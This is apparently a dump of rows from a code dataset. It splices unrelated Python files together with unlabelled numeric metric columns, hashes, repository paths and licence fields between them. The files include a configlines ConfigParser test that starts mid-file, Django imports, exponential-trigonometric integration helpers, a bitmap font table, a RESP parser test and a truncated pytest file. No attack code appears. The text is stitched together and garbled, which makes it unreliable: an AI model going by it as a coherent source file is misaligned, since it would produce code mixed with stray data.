with self.assertRaises(configparser.NoSectionError):
cfg.set('not_here', 'bar', 'C')
cfg.set('foo', 'bar', 'D', location=None)
self.assertIsNone(cfg.get_location('foo', 'bar'))
def test_set_location(self):
cfg = configlines.ConfigParser()
cfg.add_section('foo')
cfg.set('foo', 'bar', 'A')
self.assertIsNone(cfg.get_location('foo', 'bar'))
cfg.set_location('foo', 'bar', ('a', 1))
self.assertEqual(cfg.get_location('foo', 'bar'), ('a', 1))
with self.assertRaises(ValueError):
cfg.set_location('foo', 'bar', 'a bad value')
self.assertEqual(cfg.get_location('foo', 'bar'), ('a', 1))
cfg.set_location('foo', 'bar', None)
self.assertIsNone(cfg.get_location('foo', 'bar'))
with self.assertRaises(configparser.NoSectionError):
cfg.set_location('not_here', 'bar', ('a', 1))
with self.assertRaises(configparser.NoOptionError):
cfg.set_location('foo', 'baz', ('a', 1))
def test_get_nonexistant(self):
cfg = configlines.ConfigParser()
cfg.add_section('foo')
with self.assertRaises(configparser.NoSectionError):
cfg.get_location('not_here', 'bar')
with self.assertRaises(configparser.NoOptionError):
cfg.get_location('foo', 'bar')
def test_remove_option(self):
cfg = configlines.ConfigParser()
path = resource_filename(__name__, 'data1.cfg')
cfg.read(path)
self.assertEqual(cfg.get_location('foo', 'bar'), (path, 2))
cfg.remove_option('foo', 'bar')
with self.assertRaises(configparser.NoOptionError):
cfg.get_location('foo', 'bar')
cfg.set('foo', 'bar', '1')
self.assertIsNone(cfg.get_location('foo', 'bar'))
self.assertEqual(cfg.get_location('foo', 'baz'), (path, 3))
cfg.remove_option('foo', 'baz')
cfg.set('foo', 'baz', '2', location='preserve')
self.assertIsNone(cfg.get_location('foo', 'baz'))
def test_remove_section(self):
cfg = configlines.ConfigParser()
path = resource_filename(__name__, 'data1.cfg')
cfg.read(path)
self.assertEqual(cfg.get_location('foo', 'bar'), (path, 2))
cfg.remove_section('foo')
with self.assertRaises(configparser.NoSectionError):
cfg.get_location('foo', 'bar')
cfg.add_section('foo')
with self.assertRaises(configparser.NoOptionError):
cfg.get_location('foo', 'bar')
cfg.set('foo', 'bar', '1')
self.assertIsNone(cfg.get_location('foo', 'bar'))
cfg.set('foo', 'baz', '2', location='preserve')
self.assertIsNone(cfg.get_location('foo', 'baz'))
def test_xform(self):
class MyParser(configlines.ConfigParser):
def optionxform(self, option):
return option.upper()
cfg = MyParser()
path = resource_filename(__name__, 'data1.cfg')
cfg.read(path)
self.assertEqual(cfg.get('foo', 'bar'), '1')
self.assertEqual(cfg.get_location('foo', 'bar'), (path, 2))
self.assertEqual(cfg.get_filename('foo', 'bar'), path)
self.assertEqual(cfg.get_line('foo', 'bar'), 2)
cfg.set('foo', 'bar', 'A', location='preserve')
self.assertEqual(cfg.get('foo', 'bar'), 'A')
self.assertEqual(cfg.get_location('foo', 'bar'), (path, 2))
cfg.set_location('foo', 'bar', ('a', 1))
self.assertEqual(cfg.get_location('foo', 'bar'), ('a', 1))
loc = ("not_real.cfg", 1234)
cfg.set('foo', 'bar', 'B', location=loc)
self.assertEqual(cfg.get_location('foo', 'bar'), loc)
def test_custom_type(self):
# Something that isn't the default OrderedDict
class MyDict(dict):
pass
cfg = configlines.ConfigParser(dict_type=MyDict)
path = resource_filename(__name__, 'data1.cfg')
cfg.read(path)
self.assertEqual(cfg.get('foo', 'bar'), '1')
self.assertEqual(cfg.get_location('foo', 'bar'), (path, 2))
self.assertEqual(cfg.get_location('foo', 'BAR'), (path, 2))
self.assertEqual(cfg.get_filename('foo', 'bar'), path)
self.assertEqual(cfg.get_line('foo', 'bar'), 2)
self.assertEqual(cfg.get('foo', 'baz'), '2')
self.assertEqual(cfg.get_location('foo', 'baz'), (path, 3))
self.assertEqual(cfg.get_filename('foo', 'baz'), path)
self.assertEqual(cfg.get_line('foo', 'baz'), 3)
self.assertEqual(cfg.get('qwerty', 'abc'), 'a split\nline')
self.assertEqual(cfg.get_location('qwerty', 'abc'), (path, 11))
self.assertEqual(cfg.get_filename('qwerty', 'abc'), path)
self.assertEqual(cfg.get_line('qwerty', 'abc'), 11)
def test_simple_raw(self):
cfg = configlines.RawConfigParser()
path = resource_filename(__name__, 'data1.cfg')
cfg.read(path)
self.assertEqual(cfg.get('foo', 'bar'), '1')
self.assertEqual(cfg.get_location('foo', 'bar'), (path, 2))
self.assertEqual(cfg.get_location('foo', 'BAR'), (path, 2))
self.assertEqual(cfg.get_filename('foo', 'bar'), path)
self.assertEqual(cfg.get_line('foo', 'bar'), 2)
self.assertEqual(cfg.get('foo', 'baz'), '2')
self.assertEqual(cfg.get_location('foo', 'baz'), (path, 3))
self.assertEqual(cfg.get_filename('foo', 'baz'), path)
self.assertEqual(cfg.get_line('foo', 'baz'), 3)
self.assertEqual(cfg.get('qwerty', 'abc'), 'a split\nline')
self.assertEqual(cfg.get_location('qwerty', 'abc'), (path, 11))
self.assertEqual(cfg.get_filename('qwerty', 'abc'), path)
self.assertEqual(cfg.get_line('qwerty', 'abc'), 11)
def test_simple_safe(self):
cfg = configlines.SafeConfigParser()
path = resource_filename(__name__, 'data1.cfg')
cfg.read(path)
self.assertEqual(cfg.get('foo', 'bar'), '1')
self.assertEqual(cfg.get_location('foo', 'bar'), (path, 2))
self.assertEqual(cfg.get_location('foo', 'BAR'), (path, 2))
self.assertEqual(cfg.get_filename('foo', 'bar'), path)
self.assertEqual(cfg.get_line('foo', 'bar'), 2)
self.assertEqual(cfg.get('foo', 'baz'), '2')
self.assertEqual(cfg.get_location('foo', 'baz'), (path, 3))
self.assertEqual(cfg.get_filename('foo', 'baz'), path)
self.assertEqual(cfg.get_line('foo', 'baz'), 3)
self.assertEqual(cfg.get('qwerty', 'abc'), 'a split\nline')
self.assertEqual(cfg.get_location('qwerty', 'abc'), (path, 11))
self.assertEqual(cfg.get_filename('qwerty', 'abc'), path)
self.assertEqual(cfg.get_line('qwerty', 'abc'), 11)
| 41.149007
| 71
| 0.598455
| 1,524
| 12,427
| 4.744751
| 0.067585
| 0.110358
| 0.271332
| 0.316554
| 0.878993
| 0.856037
| 0.753699
| 0.709999
| 0.647075
| 0.631448
| 0
| 0.012786
| 0.213326
| 12,427
| 301
| 72
| 41.285714
| 0.726882
| 0.003541
| 0
| 0.645299
| 0
| 0
| 0.111793
| 0
| 0
| 0
| 0.000808
| 0
| 0.589744
| 1
| 0.059829
| false
| 0.004274
| 0.025641
| 0.004274
| 0.102564
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2e14029b05698a98078095dbfb57457b6cc2ce2e
| 142
|
py
|
Python
|
Home/forms.py
|
Piotr95/Yummy_Pies
|
a5101b41caa932a69a7c9eda59aef237cf6a69a8
|
[
"MIT"
] | null | null | null |
Home/forms.py
|
Piotr95/Yummy_Pies
|
a5101b41caa932a69a7c9eda59aef237cf6a69a8
|
[
"MIT"
] | null | null | null |
Home/forms.py
|
Piotr95/Yummy_Pies
|
a5101b41caa932a69a7c9eda59aef237cf6a69a8
|
[
"MIT"
] | null | null | null |
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
import datetime
| 20.285714
| 54
| 0.84507
| 20
| 142
| 6
| 0.5
| 0.25
| 0.283333
| 0.35
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112676
| 142
| 6
| 55
| 23.666667
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
2e84b206539a6313384618deb524872e21bc0563
| 787
|
py
|
Python
|
calculus.py
|
jordandll/XMath
|
27c355656f783ac68737e67ac56fd312b101073a
|
[
"MIT"
] | null | null | null |
calculus.py
|
jordandll/XMath
|
27c355656f783ac68737e67ac56fd312b101073a
|
[
"MIT"
] | null | null | null |
calculus.py
|
jordandll/XMath
|
27c355656f783ac68737e67ac56fd312b101073a
|
[
"MIT"
] | null | null | null |
def int_exp_sin(a, w):
""" Finds the primitive integral of the function,
f(t | a, w) := C e^(at + b) sin(wt + p)
where C, b, and p are arbitrary constants. Said primitive integral, hencforth 'A_f', has the general form:
A_f = Ce^(at + b)(A sin(wt + p) + B cos(wt + p)).
Returns 'A' and 'B' found in the above identity."""
B = - w / (a**2 + w**2)
A = (1 + w*B) / a
return (A, B)
def int_exp_cos (a, w):
""" Finds the primitive integral of the function,
f(t | a, w) := C e^(at + b) cos(wt + p)
where C, b, and p are arbitrary constants. Said primitive integral, hencforth 'A_f', has the general form:
A_f = Ce^(at + b)(A sin(wt + p) + B cos(wt + p)).
Returns 'A' and 'B' found in the above identity."""
A = w / (a**2 + w**2)
B = (1 - w*A)/a
return (A, B)
| 31.48
| 108
| 0.576874
| 156
| 787
| 2.858974
| 0.25641
| 0.040359
| 0.040359
| 0.047085
| 0.869955
| 0.847534
| 0.847534
| 0.847534
| 0.847534
| 0.847534
| 0
| 0.010084
| 0.243964
| 787
| 24
| 109
| 32.791667
| 0.739496
| 0.766201
| 0
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cf59367e4f8c906270bbfcf8e9c5234e6e662dce
| 5,987
|
py
|
Python
|
fonts/ami-ega_8x14.py
|
ccccmagicboy/st7735_mpy
|
b15f1bde69fbe6e0eb4931c57e71c136d8e7f024
|
[
"MIT"
] | 6
|
2020-07-11T16:59:19.000Z
|
2021-07-16T19:32:49.000Z
|
ports/esp32/user_modules/st7735_mpy/fonts/ami-ega_8x14.py
|
d4niele/micropython
|
a1f7b37d392bf46b28045ce215ae899fda8d8c38
|
[
"MIT"
] | 1
|
2020-04-14T03:14:45.000Z
|
2020-04-14T03:14:45.000Z
|
fonts/ami-ega_8x14.py
|
ccccmagicboy/st7735_mpy
|
b15f1bde69fbe6e0eb4931c57e71c136d8e7f024
|
[
"MIT"
] | null | null | null |
"""converted from ..\fonts\ami-ega__8x14.bin """
WIDTH = 8
HEIGHT = 14
FIRST = 0x20
LAST = 0x7f
_FONT =\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x18\x18\x18\x18\x18\x18\x00\x18\x18\x00\x00\x00'\
b'\x00\xcc\xcc\xcc\x48\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x36\x6c\x6c\xfe\x6c\xfe\x6c\x6c\xd8\x00\x00\x00'\
b'\x00\x18\x18\x7e\xc6\xc0\x7c\x06\xc6\xfc\x30\x30\x00\x00'\
b'\x00\x00\x00\xc2\xc6\x0c\x18\x30\x60\xc6\x86\x00\x00\x00'\
b'\x00\x00\x38\x6c\x6c\x38\x70\xde\xcc\xcc\x76\x00\x00\x00'\
b'\x00\x18\x18\x18\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x18\x30\x60\x60\x60\x60\x60\x30\x18\x00\x00\x00'\
b'\x00\x00\x60\x30\x18\x18\x18\x18\x18\x30\x60\x00\x00\x00'\
b'\x00\x00\x00\x66\x66\x3c\xff\x3c\x66\x66\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x18\x18\x7e\x18\x18\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x30\x30\x30\x60\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x7e\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\x30\x00\x00\x00'\
b'\x00\x00\x00\x02\x06\x0c\x18\x30\x60\xc0\x80\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xd6\xd6\xd6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x30\x70\xf0\x30\x30\x30\x30\x30\xfc\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\x0c\x18\x30\x60\xc6\xfe\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\x06\x1c\x06\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x0c\x1c\x3c\x6c\xcc\xfe\x0c\x0c\x0c\x00\x00\x00'\
b'\x00\x00\xfe\xc0\xc0\xfc\x06\x06\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x3c\x66\xc0\xc0\xfc\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\xfe\xc6\xc6\x0c\x18\x30\x30\x30\x30\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\x7c\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\x7e\x06\x06\xcc\x78\x00\x00\x00'\
b'\x00\x00\x00\x30\x30\x00\x00\x00\x30\x30\x00\x00\x00\x00'\
b'\x00\x00\x00\x18\x18\x00\x00\x18\x18\x18\x30\x00\x00\x00'\
b'\x00\x00\x0c\x18\x30\x60\xc0\x60\x30\x18\x0c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xfe\x00\x00\xfe\x00\x00\x00\x00\x00'\
b'\x00\x00\xc0\x60\x30\x18\x0c\x18\x30\x60\xc0\x00\x00\x00'\
b'\x00\x00\x7c\xc6\x06\x0c\x18\x18\x00\x18\x18\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xde\xde\xde\xc0\xc0\x7c\x00\x00\x00'\
b'\x00\x00\x38\x6c\xc6\xc6\xc6\xfe\xc6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\xfc\x6e\x66\x66\x7c\x66\x66\x6e\xfc\x00\x00\x00'\
b'\x00\x00\x3e\x62\xc0\xc0\xc0\xc0\xc0\x62\x3e\x00\x00\x00'\
b'\x00\x00\xf8\x6e\x66\x66\x66\x66\x66\x6e\xf8\x00\x00\x00'\
b'\x00\x00\xfe\x66\x60\x60\x78\x60\x60\x66\xfe\x00\x00\x00'\
b'\x00\x00\xfe\x66\x60\x60\x78\x60\x60\x60\xf0\x00\x00\x00'\
b'\x00\x00\x3e\x62\xc0\xc0\xc0\xde\xc6\x66\x3e\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xfe\xc6\xc6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\x78\x30\x30\x30\x30\x30\x30\x30\x78\x00\x00\x00'\
b'\x00\x00\x1e\x0c\x0c\x0c\x0c\x0c\x0c\xcc\x78\x00\x00\x00'\
b'\x00\x00\xe6\x66\x6c\x6c\x78\x78\x6c\x66\xe6\x00\x00\x00'\
b'\x00\x00\xf0\x60\x60\x60\x60\x60\x60\x66\xfe\x00\x00\x00'\
b'\x00\x00\xc6\xee\xfe\xfe\xd6\xd6\xc6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\x86\xc6\xe6\xf6\xfe\xfe\xde\xce\xc6\x00\x00\x00'\
b'\x00\x00\x38\x7c\xc6\xc6\xc6\xc6\xc6\x7c\x38\x00\x00\x00'\
b'\x00\x00\xfc\x66\x66\x66\x7c\x60\x60\x60\xe0\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\xc6\xd6\xde\x7c\x0e\x00\x00\x00'\
b'\x00\x00\xfc\x66\x66\x66\x7c\x78\x6c\x66\xe6\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc0\x60\x38\x0c\x06\xc6\x7c\x00\x00\x00'\
b'\x00\x00\xfc\xb4\x30\x30\x30\x30\x30\x30\x78\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xc6\xc6\xc6\xc6\xfe\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xc6\xc6\x7c\x38\x10\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xd6\xfe\xfe\xee\xc6\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\x6c\x38\x38\x6c\xc6\xc6\x00\x00\x00'\
b'\x00\x00\xcc\xcc\xcc\xcc\x78\x30\x30\x30\x78\x00\x00\x00'\
b'\x00\x00\xfe\xc6\x0c\x18\x30\x60\xc0\xc6\xfe\x00\x00\x00'\
b'\x00\x00\x78\x60\x60\x60\x60\x60\x60\x60\x78\x00\x00\x00'\
b'\x00\x00\x00\x80\xc0\x60\x30\x18\x0c\x06\x02\x00\x00\x00'\
b'\x00\x00\x78\x18\x18\x18\x18\x18\x18\x18\x78\x00\x00\x00'\
b'\x00\x10\x38\x6c\xc6\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00'\
b'\x00\x30\x30\x30\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x38\x0c\x7c\xcc\xcc\x76\x00\x00\x00'\
b'\x00\x00\x60\x60\x60\x78\x6c\x66\x66\x66\xdc\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7e\xc2\xc0\xc0\xc2\x7e\x00\x00\x00'\
b'\x00\x00\x0c\x0c\x0c\x3c\x6c\xcc\xcc\xcc\x76\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc6\xfe\xc0\xc2\x7e\x00\x00\x00'\
b'\x00\x00\x3c\x66\x60\x60\xf8\x60\x60\x60\xe0\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x76\xcc\xcc\xcc\x7c\x0c\xcc\x7c\x00'\
b'\x00\x00\xe0\x60\x60\x78\x6c\x66\x66\x66\x66\x00\x00\x00'\
b'\x00\x00\x18\x18\x00\x38\x18\x18\x18\x18\x1c\x00\x00\x00'\
b'\x00\x00\x0c\x0c\x00\x1c\x0c\x0c\x0c\x0c\xcc\xcc\x78\x00'\
b'\x00\x00\xe0\x60\x60\x66\x6c\x78\x6c\x66\x66\x00\x00\x00'\
b'\x00\x00\x38\x18\x18\x18\x18\x18\x18\x18\x1c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xcc\xee\xfe\xd6\xd6\xc6\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xde\x66\x66\x66\x66\x66\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc6\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xdc\x66\x66\x66\x7c\x60\x60\xe0\x00'\
b'\x00\x00\x00\x00\x00\x76\xcc\xcc\xcc\x7c\x0c\x0c\x0e\x00'\
b'\x00\x00\x00\x00\x00\xdc\x76\x60\x60\x60\x60\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc4\x70\x1c\x46\x7c\x00\x00\x00'\
b'\x00\x00\x10\x30\x30\x7c\x30\x30\x30\x36\x1c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xcc\xcc\xcc\xcc\xcc\xf6\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xcc\xcc\xcc\xcc\x78\x30\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xc6\xc6\xd6\xfe\xfe\x6c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xc6\x7c\x38\x38\x7c\xc6\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xcc\xcc\xcc\xcc\x7c\x0c\xcc\x7c\x00'\
b'\x00\x00\x00\x00\x00\xfe\x8c\x18\x30\x62\xfe\x00\x00\x00'\
b'\x00\x00\x1c\x30\x30\x30\xe0\x30\x30\x30\x1c\x00\x00\x00'\
b'\x00\x00\x30\x30\x30\x30\x00\x30\x30\x30\x30\x00\x00\x00'\
b'\x00\x00\xe0\x30\x30\x30\x1c\x30\x30\x30\xe0\x00\x00\x00'\
b'\x00\x00\x00\x76\xdc\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x10\x38\x6c\xc6\xc6\xc6\xfe\x00\x00\x00\x00'\
FONT = memoryview(_FONT)
| 57.019048
| 60
| 0.704192
| 1,459
| 5,987
| 2.886909
| 0.045922
| 0.591168
| 0.49359
| 0.316239
| 0.841643
| 0.761871
| 0.724359
| 0.631292
| 0.503324
| 0.40717
| 0
| 0.375192
| 0.019709
| 5,987
| 104
| 61
| 57.567308
| 0.342477
| 0.006514
| 0
| 0
| 0
| 0.941176
| 0.905203
| 0.905203
| 0
| 1
| 0.001347
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
d87b9ab43709962c2e411f2b68eb78fee32f5f19
| 4,581
|
py
|
Python
|
tests/ParserTest.py
|
nok/redis-resp
|
ec4e5180b83921a35b3408547de580804257873c
|
[
"MIT"
] | null | null | null |
tests/ParserTest.py
|
nok/redis-resp
|
ec4e5180b83921a35b3408547de580804257873c
|
[
"MIT"
] | null | null | null |
tests/ParserTest.py
|
nok/redis-resp
|
ec4e5180b83921a35b3408547de580804257873c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import subprocess
from unittest import TestCase
from resp.Parser import Parser
class ParserTest(TestCase):
def setUp(self):
super(ParserTest, self).setUp()
current_dir = os.path.dirname(os.path.realpath(__file__))
self.data_dir = os.path.join(current_dir, 'data')
def test_invalid_file_path(self):
file_ = os.path.join(self.data_dir, 'noname.txt')
self.assertRaises(AttributeError, Parser,
file_path=file_, redis='SET {0} {1}')
def test_invalid_command(self):
file_ = os.path.join(self.data_dir, 'dump_comma.txt')
self.assertRaises(AttributeError, Parser,
file_path=file_, redis='')
def test_output_with_comma_del(self):
file_ = os.path.join(self.data_dir, 'dump_comma.txt')
redis_cmd = 'SET {0} {1}'
code = "from resp.Parser import Parser;" \
"Parser(file_path='{}', redis='{}')".format(file_, redis_cmd)
proc = subprocess.Popen(['python', '-c', code], stdout=subprocess.PIPE)
result = proc.communicate()[0]
truth = str('*3\r\n$3\r\nSET\r\n$1\r\n1\r\n$1\r\na\r\n'
'*3\r\n$3\r\nSET\r\n$1\r\n2\r\n$1\r\nb\r\n'
'*3\r\n$3\r\nSET\r\n$1\r\n3\r\n$1\r\nc\r\n'
'*3\r\n$3\r\nSET\r\n$1\r\n4\r\n$1\r\nd\r\n').encode('utf8')
self.assertEqual(result, truth)
def test_output_with_whitespace(self):
file_ = os.path.join(self.data_dir, 'dump_with_whitespace.txt')
redis_cmd = 'SET {0} {1}'
code = "from resp.Parser import Parser;" \
"Parser(file_path='{}', redis='{}')".format(file_, redis_cmd)
proc = subprocess.Popen(['python', '-c', code], stdout=subprocess.PIPE)
result = proc.communicate()[0]
truth = str('*3\r\n$3\r\nSET\r\n$1\r\n1\r\n$1\r\na\r\n'
'*3\r\n$3\r\nSET\r\n$1\r\n2\r\n$1\r\nb\r\n'
'*3\r\n$3\r\nSET\r\n$1\r\n3\r\n$1\r\nc\r\n'
'*3\r\n$3\r\nSET\r\n$1\r\n4\r\n$1\r\nd\r\n').encode('utf8')
self.assertEqual(result, truth)
def test_output_with_semicolon_del(self):
file_ = os.path.join(self.data_dir, 'dump_semicolon.txt')
redis_cmd = 'SET {0} {1}'
code = "from resp.Parser import Parser;" \
"Parser(file_path='{}', redis='{}', delimeter=';')".format(
file_, redis_cmd)
proc = subprocess.Popen(['python', '-c', code], stdout=subprocess.PIPE)
result = proc.communicate()[0]
truth = str('*3\r\n$3\r\nSET\r\n$1\r\n1\r\n$1\r\na\r\n'
'*3\r\n$3\r\nSET\r\n$1\r\n2\r\n$1\r\nb\r\n'
'*3\r\n$3\r\nSET\r\n$1\r\n3\r\n$1\r\nc\r\n'
'*3\r\n$3\r\nSET\r\n$1\r\n4\r\n$1\r\nd\r\n').encode('utf8')
self.assertEqual(result, truth)
def test_output_with_mult_cols(self):
file_ = os.path.join(self.data_dir, 'dump_mult_cols.txt')
redis_cmd = 'SET {0} {2}'
code = "from resp.Parser import Parser;" \
"Parser(file_path='{}', redis='{}')".format(file_, redis_cmd)
proc = subprocess.Popen(['python', '-c', code], stdout=subprocess.PIPE)
result = proc.communicate()[0]
truth = str('*3\r\n$3\r\nSET\r\n$1\r\n1\r\n$1\r\na\r\n'
'*3\r\n$3\r\nSET\r\n$1\r\n2\r\n$1\r\nb\r\n'
'*3\r\n$3\r\nSET\r\n$1\r\n3\r\n$1\r\nc\r\n'
'*3\r\n$3\r\nSET\r\n$1\r\n4\r\n$1\r\nd\r\n').encode('utf8')
self.assertEqual(result, truth)
def test_output_with_mult_comds(self):
file_ = os.path.join(self.data_dir, 'dump_mult_cols.txt')
redis_cmd = 'SET {0} {2} | SET {0} {1}'
code = "from resp.Parser import Parser;" \
"Parser(file_path='{}', redis='{}')".format(file_, redis_cmd)
proc = subprocess.Popen(['python', '-c', code], stdout=subprocess.PIPE)
result = proc.communicate()[0]
truth = str('*3\r\n$3\r\nSET\r\n$1\r\n1\r\n$1\r\na\r\n'
'*3\r\n$3\r\nSET\r\n$1\r\n1\r\n$1\r\nz\r\n'
'*3\r\n$3\r\nSET\r\n$1\r\n2\r\n$1\r\nb\r\n'
'*3\r\n$3\r\nSET\r\n$1\r\n2\r\n$1\r\ny\r\n'
'*3\r\n$3\r\nSET\r\n$1\r\n3\r\n$1\r\nc\r\n'
'*3\r\n$3\r\nSET\r\n$1\r\n3\r\n$1\r\nx\r\n'
'*3\r\n$3\r\nSET\r\n$1\r\n4\r\n$1\r\nd\r\n'
'*3\r\n$3\r\nSET\r\n$1\r\n4\r\n$1\r\nw\r\n').encode('utf8')
self.assertEqual(result, truth)
| 47.71875
| 79
| 0.534599
| 820
| 4,581
| 2.891463
| 0.10122
| 0.080978
| 0.060734
| 0.080978
| 0.850696
| 0.83973
| 0.83973
| 0.83973
| 0.811472
| 0.751582
| 0
| 0.042286
| 0.251473
| 4,581
| 95
| 80
| 48.221053
| 0.649169
| 0.009168
| 0
| 0.634146
| 0
| 0.292683
| 0.349129
| 0.246418
| 0
| 0
| 0
| 0
| 0.085366
| 1
| 0.097561
| false
| 0
| 0.109756
| 0
| 0.219512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2b26b5956613b962554ab6447760a9497fa7e2f6
| 155
|
py
|
Python
|
umigame/datasets/__init__.py
|
penguinwang96825/Umigame
|
98d647ab6f40df08fe31d6b3bc444afe229a914e
|
[
"Apache-2.0"
] | null | null | null |
umigame/datasets/__init__.py
|
penguinwang96825/Umigame
|
98d647ab6f40df08fe31d6b3bc444afe229a914e
|
[
"Apache-2.0"
] | null | null | null |
umigame/datasets/__init__.py
|
penguinwang96825/Umigame
|
98d647ab6f40df08fe31d6b3bc444afe229a914e
|
[
"Apache-2.0"
] | 1
|
2021-11-01T14:35:32.000Z
|
2021-11-01T14:35:32.000Z
|
from .crypto import fetch_crypto
from .stock import fetch_usstock
from .text import fetch_twitter
from .text import fetch_news
from .text import fetch_text
| 31
| 32
| 0.845161
| 25
| 155
| 5.04
| 0.36
| 0.436508
| 0.333333
| 0.452381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122581
| 155
| 5
| 33
| 31
| 0.926471
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
993e737510b66ecb431a3a6f8e97c350e64978c7
| 3,708
|
py
|
Python
|
AutomationFramework/tests/hardware/test_hw_cpu.py
|
sbarguil/Testing-framework
|
f3ef69f1c4f0aeafd02e222d846162c711783b15
|
[
"Apache-2.0"
] | 1
|
2020-04-23T15:22:16.000Z
|
2020-04-23T15:22:16.000Z
|
AutomationFramework/tests/hardware/test_hw_cpu.py
|
sbarguil/Testing-framework
|
f3ef69f1c4f0aeafd02e222d846162c711783b15
|
[
"Apache-2.0"
] | 44
|
2020-08-13T19:35:41.000Z
|
2021-03-01T09:08:00.000Z
|
AutomationFramework/tests/hardware/test_hw_cpu.py
|
sbarguil/Testing-framework
|
f3ef69f1c4f0aeafd02e222d846162c711783b15
|
[
"Apache-2.0"
] | 6
|
2020-04-23T15:29:38.000Z
|
2022-03-03T14:23:38.000Z
|
import pytest
